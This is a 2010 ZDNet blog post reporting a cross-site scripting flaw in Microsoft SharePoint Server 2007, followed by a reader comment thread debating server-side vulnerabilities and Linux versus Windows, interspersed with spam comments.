ie8 fix
madison

Zero Day

Ryan Naraine, Emil Protalinski and Dancho Danchev
Home / News & Blogs / Zero Day

Serious XSS flaw haunts Microsoft SharePoint

By | April 29, 2010, 12:58pm PDT

Summary: The vulnerability, which can be exploited via the browser, could allow a malicious hacker to execute arbitrary JavaScript code within the vulnerable application.

Microsoft’s security response team has confirmed the existence of a serious cross-site scripting (XSS) vulnerability in the Microsoft SharePoint Server 2007 product.

The vulnerability, which can be exploited via the browser, could allow a malicious hacker to execute arbitrary JavaScript code within the vulnerable application.  A proof-of-concept exploit has been publicly posted and Microsoft is expected to issue a formal security advisory before the end of this week to offer pre-patch workaround and mitigations.

Here’s the skinny on the flaw from an alert posted to the the Full Disclosure mailing list:follow Ryan Naraine on twitter

The vulnerability exists due to failure in the “/_layouts/help.aspx” script to properly sanitize user-supplied input in “cid0″ variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability.

On Twitter, Microsoft said it was aware of the issue and promised to issue guidance for affected customers:

This isn’t Microsoft SharePoint’s first brush with XSS security problems.  Back in 2007, the company shipped an “important” security patch to fix a flaw that allowed attackers to run arbitrary script that could result in elevation of privilege within a SharePoint site.

Kick off your day with ZDNet's daily e-mail newsletter. It's the freshest tech news and opinion, served hot. Get it.

More from “Zero Day”

Topics

Microsoft SharePoint, Flaw, Vulnerability, XSS, Microsoft Corp., Authentication, Content Management, Security, Enterprise Software, Software, Ryan Naraine

Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues.

Disclosure

Ryan Naraine

The most important disclosure is of my employment with Kaspersky Lab as a member of the global research and analysis team. Kaspersky Lab is a global company specializing in anti-malware and secure content management technologies. I do not own stocks or other investments in any technology company.

Biography

Ryan Naraine

Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the globe. He is taking a leadership role in developing the company's online community initiative around secure content management technologies.

Prior to joining Kaspersky Lab, Ryan was Editor-at-Large/Security at eWEEK, leading the magazine's and Web site's coverage of Internet and computer security issues and managing the popular SecurityWatch blog, covering the daily threats, vulnerabilities and IT security technologies. He also covered IT security, hacker attacks and secure content management topics for Jupiter Media's internetnetnews.com.

Ryan can be reached at naraine SHIFT 2 gmail.com. For daily updates on Ryan's activities, follow him on Twitter.

Related Discussions on TechRepublic

Did you know you can take part in these discussions with your ZDNet membership?
Ask a Question Start a Discussion
60
Comments
Add Your Opinion

Join the conversation!

Just In

RE: Serious XSS flaw haunts Microsoft SharePoint
FAULKNE 13th Oct
Good day to confirm this comment I would appreciate T h e b e s t o f Z D N e t d e l i v e r e d your website very nice to everyone Yes, Oracle is the only one with shared-disk architecture, but that is there advantage. It means you can add or remove nodes and the database lives on. In a shared nothing architecture, if you lose a node, you lose the system. I'm sure Oracle appreciates EMC highlighting their advantage.I also desire to signal in your RSS feeds. Thank you as soon as once again and maintain up the great operate Awesome post! Thank you very much || thanks for nice content this is really benefit to me.
View in thread
0 Votes
+ -
maybe now the Linux
honeymonster 29th Apr 2010
zealots will agree that XSS is a server side
vulnerability?
0 Votes
+ -
No
bobiroc 29th Apr 2010
you see SharePoint is still a Microsoft Product so they will have a field day with this one. Only if it is a Linux Server will they make up crap to try and fulfill their belief that anything Linux is secure by design.
0 Votes
+ -
It IS a Microsoft vulnerability
Great Kahuna Updated - 29th Apr 2010
only not a server vulnerability.

While in those other cases you mention Linux and Apache have got absolutely nothing to do with the vulnerability, they merely provide the platform, in this case Microsoft is 100% responsible for the vulnerability.
0 Votes
+ -
Javascript blows security holes everywhere
LBiege 29th Apr 2010
It's inherently a zero-security, disastrous language for developing web apps. This whole JS/XSS/CSS thing should be replaced with sth new or it will keep going on like this.
0 Votes
+ -
You are very unwise in writing about stuff you don't understand
Great Kahuna 29th Apr 2010
I suggest you buy a few books to get started. Those in the "for dummies" collection are good choices for people with your current skill set.
0 Votes
+ -
And saying that someone is wrong without saying how makes you a genius?
valvestate@... 1st May 2010
LBiege is right. JavaScript like Microsoft is an example of what goes wrong when you try to be all things to all people.

When Netscape created JavaScript, they took the easy way (but they claimed to try to be universal to coders of different languages) and hacked together pieces (syntax) from different languages instead of originating a new language.

To expound on what I think LBiege is saying, the more dynamic (more work left to the compiler)a language is, the easier it is to code and less prone to error on the part of the coder. It would stand to reason also that the more basic a language is, the easier it would be to find the fewer vulnerabilities.

Since JavaScript is a cobble of different languages it is far more complex than it needs to be. Python, Ruby, and even PHP are far better suited. But, who's going to turn the Titanic around at this point?
0 Votes
+ -
Get ready for another round of grand linux trolling
LBiege 29th Apr 2010
Wait, they are already here faster than you can 'troll'. Never mind.
0 Votes
+ -
Yes, it's a Microsoft product, thus; problems in it are Microsoft's fault.
AzuMao 29th Apr 2010
Nothing to do with Windows vs Linux.
0 Votes
+ -
Nope!
Great Kahuna 29th Apr 2010
It's a web application vulnerability.

The server has got nothing to do with it.
0 Votes
+ -
Try reading my post again
honeymonster 29th Apr 2010
and, please, try to figure out what server
side means.

When Apache's JIRA app was compromised through an
XSS vuln you claimed it was an Internet
Explorer vulnerability.
0 Votes
+ -
Yes, most probably some vulnerability in MSIE was exploited...
Great Kahuna 29th Apr 2010
to steal the admin cookies/credentials.

Remember what happened with the Google China attack from December 2009? An MSIE 6 vulnerability was the cause of it all.
0 Votes
+ -
I think you misunderstand the argument...
storm14k 29th Apr 2010
An XSS flaw in a web app has no more to do with
Linux than this XSS flaw in Sharepoint has to do
with Windows. The argument is that its not a flaw
in the SERVER. I mean why bother...we all know
better and its just fun and games anyway. Which
leads me to the post I'm about to make...
0 Votes
+ -
XSS attacks are server side*.. at the application, not OS, level.
AzuMao Updated - 29th Apr 2010
This isn't a problem in Windows or IIS, but rather a problem in Microsoft SharePoint.

Just like the WordPress one wasn't a problem in Linux or Apache, but rather WordPress.




*except in the case of IE, which is such a horrible client it manages to make XSS attacks easier in its attempt to block them.
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
lovedong Updated - 12th Sep
Many many thanks! chanel bags
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
lovedong 13th Sep
That's pretty amazing...really great work on this!! rolex watches
0 Votes
+ -
Good thing nobody uses Sharepiss anyway nt
storm14k 29th Apr 2010
nt
0 Votes
+ -
Re
dvm 29th Apr 2010
Are you sure about that?

"Microsoft sold 75 million through the end of 2005
and 25 million more in the last two years"

http://www.informationweek.com/news/internet/showA
rticle.jhtml?articleID=206901417
0 Votes
+ -
How many of those came bundled with Windows Pro/Ultimate?
AzuMao 29th Apr 2010
0 Votes
+ -
Sharepoint is a separate $$ item
Johnny Vegas 29th Apr 2010
It is sold. It generates over a Billion dollars a year for MS
0 Votes
+ -
Try commenting on a topic you know about
honeymonster 29th Apr 2010
It is obviously not Sharepoint.

Sharepoint is a content management and
collaboration server. You cannot get it
with Pro/Ultimate.

Sahrepoint is a kick-ass product (for users)
which sees tremendous success in enterprises
because of its ease of use and (almost) first
class integration with Office.

Suggesting that it was bundled with a client OS
is, well, revealing.
0 Votes
+ -
Re:
dvm 30th Apr 2010
Short answer, NONE.
0 Votes
+ -
Are you stupid?
Johnny Vegas 29th Apr 2010
or was that just a humor=EPICFAIL on your part?
Sharepoint is used by about a 100 million people every day.
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
Loverock Davidson 29th Apr 2010
Only a proof-of-concept so its not a threat. Since people only use SharePoint on internal networks and not publicly this isn't that big of a deal anyway. Any rogue employee that tries to exploit it will get fired very quickly.
0 Votes
+ -
As usual all is perfect in Loverock's Microsoft Fantasy Land
Great Kahuna 29th Apr 2010
I guess some things will never change.
0 Votes
+ -
Right now there is "only a proof-of-concept", yes. But MS are going to wait
AzuMao 29th Apr 2010
a week just to offer some hacky workaround (most likely involving messing with the command line or registry), and god knows how long for an actual fix that most people will be able to apply.

In the mean time, black hats will probably make a real attack based on this vulnerability.
0 Votes
+ -
finally...
pgit 30th Apr 2010
Thank you. You finally admitted Linux is far more secure than windows, because 100% of all "exploits" in Linux have been "proof of concept" and never been seen in the wild, save like 3 Unix viri that were taken care of in 1980-something.

Of course windows currently has 56,000 + active exploits in the wild, running somewhere as we speak.

It's about time this fellow came around, I KNEW it was only a matter of time! =D
0 Votes
+ -
wow... gullible...
erik.soderquist 4th May 2010
first: a proof of concept means the attack is possible, and that we have not detected it in the wild does not mean it isn't there already. as long as the vulnerability exist, it IS a threat

second: millions of SharePoint sites are public facing, and i've administered a couple hundred myself. the customer wants it and pays for it, the customer gets it.

third: the 'fired very quickly' scenario only works if you can prove it, and even then, firing the employee doesn't repair whatever damage was done. and if you fire for that reason without being able to prove it, you open yourself wrongful termination suits. and whatever the rogue has gained from the exploit is still stolen. i don't know about you, but i would find a fired employee very poor compensation for highly sensitive/trade secret data being stolen and sold to my competitors.
0 Votes
+ -
OMGWTFBBQ! A vulnerability!!!!!
Cylon Centurion Updated - 29th Apr 2010
Imperfect software coded by imperfect people. Imagine that. Wwould you people get over it?
I'm tired of seeing these arguments. Same damn thing everytime, and what is the outcome?
0 Votes
+ -
What are you doing here then?
Great Kahuna 29th Apr 2010
Ah, I get it now. You're waiting for those posts selling shoes, ******** and the like. You need to buy some stuff on the cheap but forgot the links.

Don't worry pal, they will be here soon. Happy Shopping!
0 Votes
+ -
A new deck of poker cards for tonight's gamble, perhaps?
Great Kahuna 29th Apr 2010
I don't think they are selling poker cards, only shoes, ******** and lingerie.

Hey, you need lingerie for poker, don't you? I mean strip poker, of course.
0 Votes
+ -
You replied twice?
Cylon Centurion Updated - 29th Apr 2010
ALL software has its flaws. I can't believe we have to argue of that.
0 Votes
+ -
Just because nothing is perfect doesn't make everything the same.
AzuMao 29th Apr 2010
Polar bears and humans are both not 100% covered in fur.
Linux and Windows are both not 100% immune to hackers.


But they aren't the same.

To clear up this confusion, I recommend the adoption of RSS (Relative Suckitude Scale); on one far extreme of this scale lay Microsoft products (100), and on the polar opposite, absolute 100% perfection (0).

You will find that many things are somewhere in between these two diametrically opposed opposites.
0 Votes
+ -
Funny how a corporation grossing billions a year is more imperfect than..
AzuMao 29th Apr 2010
..a rag-tag group of volunteers messing around in their spare time.
0 Votes
+ -
Not surprising at all.
anothercanuck Updated - 29th Apr 2010
The goal of one group is separating you from your money. The goal of the other group is perfect code. No surprise at all and it seems both groups are achieving their goals.
0 Votes
+ -
Re:Wrong post
dvm Updated - 29th Apr 2010
NT
0 Votes
+ -
Isn't SharePoint usually behind a corporate firewall?
Vesicant 29th Apr 2010
Who exposes SharePoint to the Internet in general?
0 Votes
+ -
Lots of people do
toadlife 29th Apr 2010
We have public portal based on Sharepoint and in the process of launching it, conversed with tons of other organizations that do too.
0 Votes
+ -
But when you do that
honeymonster 29th Apr 2010
you have probably developed a custom skin and the
page in question is not available, right?
0 Votes
+ -
Idiots use Sharepoint for anything
itguy08 30th Apr 2010
Especially in the Internet.
0 Votes
+ -
Did SharePoint kill your dog or something?
crazydanr@... 30th Apr 2010
Every SP story on here you swing by and try to convince everyone it is junk. It's used by tens of thousands of businesses around the world, in a huge variety of deployment situations. It must be a little bit ok if there's that many people running it.

I don't know what it did to you to merit so much time bashing it, but I really think you should spend your time doing something more constructive.
0 Votes
+ -
First we had PowerPoint
ubiquitous one 30th Apr 2010
http://blogs.zdnet.com/storage/?p=878&tag=nl.e539

Now we have SharePoint.

So how many more M$ "Points" have to be deducted.

Hmmm?
0 Votes
+ -
Is this not an inherent server vulnerability issue?
Dietrich T. Schmitz, Your Linux Advocate Updated - 1st May 2010
Taken from:
http://en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios

Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.

Non-persistent:

1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect.
4. Alice visits the URL provided by Mallory while logged into Bob's website.
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.

Persistent attack:

1. Mallory posts a message with malicious payload to a social network.
2. When Bob reads the message, Mallory's XSS steals Bob's cookie.
3. Mallory can now hijack Bob's session and impersonate Bob.[16]

Framework:

A Browser Exploitation Framework could be used to attack the web site and the user's local environment.
0 Votes
+ -
Yes it is
honeymonster Updated - 3rd May 2010
Cross Site Scripting (XSS) are server
side vulnerabilities. Some browsers may try to
mitigate the *risk* by using heuristics to
recognize an attack.

You just quoted two very good examples. Those
two examples exploited server side (web
application) vulnerabilities.

0 Votes
+ -
fuzziness...
erik.soderquist 4th May 2010
i think some of the confusion is coming from the fuzziness in the distinction between server and server side.

the delineation i have always used is that Windows/IIS or Linux/Apache is the server, and anything that resides between the server and the connection to the client, such as SharePoint, WordPress, etc, is server side. these are applications designed to run on the server and are dependent on the server's presence to function, but are still applications. they are server side because they literally reside on the server rather than the client, but are still applications.

i've little doubt that many will disagree with my delineations, but having a delineation spelled out, even one that is disagreed with or even flamed to death, i hope will help clarify that there is a difference between server and server side
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
davymeers 3rd May 2010
"The vulnerability exists due to failure in the
?/_layouts/help.aspx? script to properly sanitize user-
supplied input in ?cid0? variable."

Is it just me or are there others that find it rather
unbelievable that such a basic thing as not trusting the
user-supplied input lies at the base of this flaw?

What about some basic security education, guys!?
0 Votes
+ -
To AzuMao
jryanp 3rd May 2010
You, sir/madame, are a god/goddess among men.

Your posts make me laugh out loud as I hear various trolls explode.
0 Votes
+ -
SharePoint is often Internet facing not just Intranet
mandrake64 3rd May 2010
Many companies use the flexibility and security of SharePoint (and AD) to generate Internet facing websites that allow them to share information with their employees, customers and partners without the need to fully sandbox the information on a separate external site.

Compromising security might not gain an intruder access to the full internal company network but could allow them to obtain sensitive information from other SharePoint sites on the same server.

Companies will crack down severely on any sort of employee access to the Internet through the company firewall but don't think twice using products from a major software vendor that expose them to many times the risk. This is a serious concern.
0 Votes
+ -
Its about time Microsoft were.....
carlsf@... Updated - 3rd May 2010
made responsiable for their FAILINGS and inability to produce safe code/applications.

I hate to think how many times I have purchased a MS product (O/S , Application) to find it does NOT work as expected or has a major fault, and I have been with IT and using MS products for 23 years.

MS dont listen to their users, they just make changes for changes and remove features and components that people rely on to perform their jobs.

I/we have STOPED the clock and will NOT be moving forward to MS's latest products. There are two main reasons and they are...
1) WIN7 they have changed the interface and moved to many things they have made it unproductive. also they have removed the "CLASIC" option.
2) Office 2007/10 they have the HATED "RIBBON" interface and as in WIN7 removed the "CLASIC" option.

We as I said have stoped and will be staying with XP/VISTA and on Office 2003.

MS's LOSS (115+ seats)
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
efsane Updated - 9th Apr 2011
Well done! Thank you very much for professional templates and community edition
sesli sohbet sesli chat
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
myclub 1st Jul
http://www.52tube.com/
http://www.wctube.com/
http://www.cameporn.com/
http://www.escortbayan9.com/
tamam
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
FAULKNE 13th Oct
Good day to confirm this comment I would appreciate T h e b e s t o f Z D N e t d e l i v e r e d your website very nice to everyone Yes, Oracle is the only one with shared-disk architecture, but that is there advantage. It means you can add or remove nodes and the database lives on. In a shared nothing architecture, if you lose a node, you lose the system. I'm sure Oracle appreciates EMC highlighting their advantage.I also desire to signal in your RSS feeds. Thank you as soon as once again and maintain up the great operate Awesome post! Thank you very much || thanks for nice content this is really benefit to me.

Join the conversation!

Formatting +
BB Codes - Note: HTML is not supported in forums
  • [b] Bold [/b]
  • [i] Italic [/i]
  • [u] Underline [/u]
  • [s] Strikethrough [/s]
  • [q] "Quote" [/q]
  • [ol][*] 1. Ordered List [/ol]
  • [ul][*] · Unordered List [/ul]
  • [pre] Preformat [/pre]
  • [quote] "Blockquote" [/quote]
ie8 fix
Click Here
ie8 fix

The best of ZDNet, delivered

ZDNet Newsletters

Get the best of ZDNet delivered straight to your inbox

Facebook Activity

Blog Roll

Blog Archive

White Papers, Webcasts, & Resources
ie8 fix
ie8 fix